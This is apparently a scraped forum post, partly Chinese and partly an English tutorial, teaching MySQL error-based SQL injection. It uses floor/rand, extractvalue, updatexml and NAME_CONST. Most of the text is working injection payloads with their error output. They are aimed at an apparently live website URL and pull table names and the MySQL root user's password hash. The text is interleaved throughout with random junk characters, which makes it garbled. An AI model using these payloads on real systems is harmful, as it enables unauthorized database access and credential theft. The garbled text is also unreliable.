1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
" c5 b8 D+ ~3 e4 U! v首先进行正常查询: mysql> select * from article where id = 1;
2 o9 w3 D3 M! ~+ z4 ^/ j. g+—-+——-+———+
6 V0 S5 T1 ?( r; s) @| id | title | content |* C+ Y& t% X: j) i8 j' p" d
+—-+——-+———+9 G0 X4 I/ _- b$ V! x' Z( m
| 1 | test | do it |
; P6 d# o1 |) H3 K+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
; {+ ^$ [+ L: d3 z' \4 yERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
1 _1 ]1 h! j* r5 w6 E例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
$ g# v, H2 Z' ]; J" _( c0 b" YERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
! ^7 Q! V2 ]7 S; z2 UERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue: z# T" p# e) j- u4 P0 N
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–& n3 C, D( @+ Z4 Q
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ ( ], Q- M% T5 z* |3 T& H# m
- ^" v/ m0 b& R% Y
再收集:
- }/ n2 I2 G# t! ]% p! {) `http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) # \9 d" A: L$ m' E" q! C
, S6 h2 F i6 I; a
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
' z/ E& A: p# ^2 a2 m4 L+ a) C- G* I
" J7 v; J% O# p1 J4 Ahttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)9 H5 f+ `* F$ L+ \3 g. u0 K8 I
7 r n; i1 c! S$ H# F P/ EErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ : c: s3 Y( Y! Z+ u) M& [
! Z' |3 E* I" C: U$ C; E: `
MYSQL高版本报错注入技巧-利用NAME_CONST注入0 ~# o* A; U; G
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
" a) B/ E& X+ B4 ?; b/ i1 Z( s- z6 w
' R9 Q, O6 H; f' R
相关信息
7 B7 y; Y$ c7 p; D; _ b
% g' B/ w& m& fNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
; V# ]1 F( F x7 G& s1 g8 }5 D0 S- G$ \8 b% ]
Code:6 S" |: h! ^2 C
NAME_CONST(DATA, VALUE)2 h+ L+ d {- Z% v" C* A
, G$ O+ L4 Q2 B; Z1 {Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
]+ L+ H) p$ }9 D
7 |* N0 H0 E, L1 CSELECT NAME_CONST('TEST', 1)- W( s' M$ C3 l8 i5 R; ?# X( N
. u' |9 w/ N% v+ g* I: v" W. ?
N2 `; q$ r* k8 [* @/ P7 e; u9 S9 \9 ]; [
|---------------|' H. ]- s' b: w' ?/ d% T9 Y4 n5 n& P
| TEST |
& m% W. q% m3 R| | z& _8 L/ r2 a8 {# |2 Q: y
|---------------|7 Z" `% u9 t$ n7 b: \3 _2 G
| 1 |5 a2 L9 D! \. s7 O5 Z
| |
! U' N8 x% ]) @ n|---------------|; \5 {# f) O% y/ y
* U; x Y$ c, I$ T
. x `1 E! U. A7 w m: P3 s7 Y* _1 ?* U9 ]$ F7 I; r
/ ?# Z# d7 B3 r; `http://dev.mysql.com/doc/refman/5.0/en/m...name-const) j" k/ p7 Z, h+ h1 @8 r* k
Intro to MySQL Variables4 g" j7 E ^1 `- |, I: ^
2 y: R" `5 ?4 e9 n! D
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.% \% k, P4 Y) O M
: V- G l( y8 ?4 E* MCode:0 ?% p$ v& O$ J8 t
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
$ G# h+ p0 `( Z' g. y
& ?5 F7 J) i1 m& E# Y# ~( u
% [$ P9 z7 D6 k" U: n3 Z
F- L) l) w5 Z8 P$ b# c) P2 J5 d W5 j/ m: s9 A
3 G" `+ t0 l" a4 Z& ACode:
$ m7 ^2 k) G; T( m: Land+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--+ h' ^4 H9 s) d' t& ]* u7 j
8 O7 p- w6 H, O. ]5 W* L9 _% m: T" Q# {' {) O
VAR = Your MySQL variable.$ w% I5 ?! f6 r. J5 i
. i) ^* f9 d9 N( W* D! ]MySQL 5.1.3 Server System Variables
3 W' ?' T I! x: h; L0 I4 C. |% L
" L. _/ @0 a1 S4 Q5 F" q* b; dLet's try it out on my site..; [8 j2 Q4 F" G0 f. `$ a
$ R& V K. Z6 _9 F
Code:
: m) X4 n. B! R$ f4 S5 P( T# i7 lhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
+ M' \8 t$ H, x& ~( B6 a: C) N, K: w, j
Erroruplicate column name '5.0.27-community-nt'0 }8 A, z6 b$ z0 R: j
7 t; K8 j% n) {& { a y9 [ N9 D6 c% O8 }- _
& m) B- N: U4 K. f/ U" ?; g/ Y
. Z5 `' m- s8 {
m$ k5 I8 y. r Z% \) n# ]- ANow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
4 t4 b% \9 c y: e: F1 N% o& _+ j0 }/ F# p+ C0 e6 \
Data Extraction) O: C `$ y: }
) L6 w" E/ i& n" `$ F: u5 `
Code:: `& T( v2 c7 l# \; q- b
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--$ R' F8 R7 E( [! L
4 `2 P3 q& `7 k# [" v( S2 {
# F9 [0 I0 y# ^9 L, d1 \We should get a duplicate column 1 error...2 ^ [( i# G6 i
1 L# h0 K, g6 ~8 R j. t: E( w7 }Code:
C+ N0 B' H- ^ s% nhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--0 `+ c+ ^; m; H0 O, F1 m! V
! n7 G3 i# F1 l! }# c& d6 b; nErroruplicate column name '1
0 _: V' `) N. a0 b
& L; f) K1 }+ y4 n* V9 ?
f6 V' N, L7 s$ I7 i
5 o& O( F0 c" D6 a7 L
6 W# i6 R0 N, V& m$ F
" A+ c' U2 A5 p1 N o8 C
/ Q0 b( o* W& f( aNow let's get the tables out this bitch..
5 g8 a! i* H. {" B5 T- z2 a% S3 O7 o c3 {) k2 j% n
Code:. N/ W% V; l1 K; [/ `5 J. N) e
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
2 w# U: a5 I, ^5 a* n2 c! j! v9 l% H+ l% \+ f% L% W0 x) ^: i
, f5 k; `0 u" Y5 I0 }( a4 jLet's see if it works here, if it does, we can go on and finish the job.+ U9 u. A# A- H4 a
5 c5 n) b- U4 cCode:
- P+ I$ J. k& Q0 J$ l# zhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--2 p9 \1 L4 F% b0 |, Y
9 `6 Z& B/ [3 }7 ~/ A0 _$ _7 v3 T0 Z9 e/ `) T! a3 v3 r* Q
Erroruplicate column name 'com_admanage* @ I+ e% A7 z# k
* p# |& _& F$ Z; w
% V$ [2 B& ^/ C0 N) [7 a4 T" O
% B* q. L: y: w8 H$ y
2 I: V4 z" C" r3 S
E* }! s- j; x) k& }% y g/ D) ? v$ `1 M4 i8 e( z6 S" u
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.. d4 B4 w& j1 y- O
' |, A/ W4 m, s7 X# nLet's get the columns out of the user table..
! c/ ~/ q& R' |% K3 C
4 p& E, X3 U) O. oCode:
& z8 N- T( I. w0 g3 r+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
6 Y* J6 X& w( d: R- m1 E4 s0 M }& {- c
. R4 A9 K5 N6 X, i& q; n2 C6 jSo mine looks like this, and I get the duplicate column name 'Host'.
2 i3 [5 W: W* G6 |! s" r4 @! Z- ?4 ?% P5 P1 R
Code:( d4 ?! G3 `/ \: J5 X* ?6 W
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
3 X3 p, }2 a. r4 ?* j" L* q) K, ^- x& l
8 n$ @. a: o( j/ _# a. e1 A' EErroruplicate column name 'Host'0 S3 y2 I' \# o( ^7 K+ k
- e3 `7 q4 @& l/ G# t! I; }$ Z5 P8 [" f. r% X% F4 u
p4 ?7 V. ?5 N; t+ ]- e
+ L3 v8 a# P8 @9 ~
! c& H, o7 w& V+ c# G1 K C; `
3 O# S3 Y3 J8 p/ c3 l2 q2 bWoot, time to finish this bitch off.& K0 u0 y9 O; T
6 I2 G4 J1 `/ Q/ U8 R9 U
Code:- C: x# \# e% s7 I2 Y! t9 w- R
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--3 n& h# d% |1 l+ {* \6 {
. O; }0 {$ _: j% y+ ~/ \, s$ h' P
4 K! r8 r6 l0 W7 A- }
So mine looks like this...
! U" z2 I0 L3 \) N
- o. C: e7 O& I' W' L( ]+ ?Code:
1 z f8 ~7 M3 V( i! \" khttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
" _7 }# i+ H0 e$ _
/ q8 A3 A* |. h0 }& H6 jErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
3 k9 H$ o0 @) a5 r7 h9 D/ e8 f$ F# C
0 {: E6 g6 D, v2 I+ g7 E) _/ m, H
: Q+ o9 d" o V5 [: B
k$ _' ?& j+ m+ }, r* w1 v8 o! E- A" n3 I! n# M6 s$ j$ n/ ]
( o# }# Z( ~$ o, |, L0 P
And there we have it, thanks for reading.( g3 [8 w1 f# s* y) ]
% h/ W8 v3 I! j, \7 W
|